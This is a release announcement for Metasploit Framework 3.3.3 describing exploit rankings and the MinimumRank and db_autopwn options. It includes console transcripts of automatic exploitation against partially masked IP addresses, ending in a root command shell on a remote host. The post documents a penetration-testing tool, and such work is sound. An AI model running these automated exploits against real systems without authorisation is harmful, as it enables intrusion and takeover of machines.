This morning we released
version 3.3.3 of the Metasploit Framework - this release focuses on
exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.
The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The
wiki page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:
msf>
search -r great
From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:
msf>
setg MinimumRank excellent
msf>
use exploit/windows/smb/ms08_067_netapi
msf (exploit/ms08_067_netapi) >
exploit
[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).
The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the
nexpose_scan or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:
msf exploit(psexec) >
db_autopwn -b -x -t
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.47.203:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.32.2:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.32.2:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.44.223:139 exploit/solaris/samba/trans2open (CVE-2003-0201, BID-7294)
[*] XX.YY.44.223:139 exploit/multi/samba/nttrans (CVE-2003-0085, BID-7106)
[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.47.203:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
msf exploit(psexec) >
db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
msf exploit(psexec) >
db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec
msf exploit(psexec) >
sessions -i 1
[*] Starting interaction with 1...
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc
id
uid=0(root) gid=0(wheel) groups=0(wheel)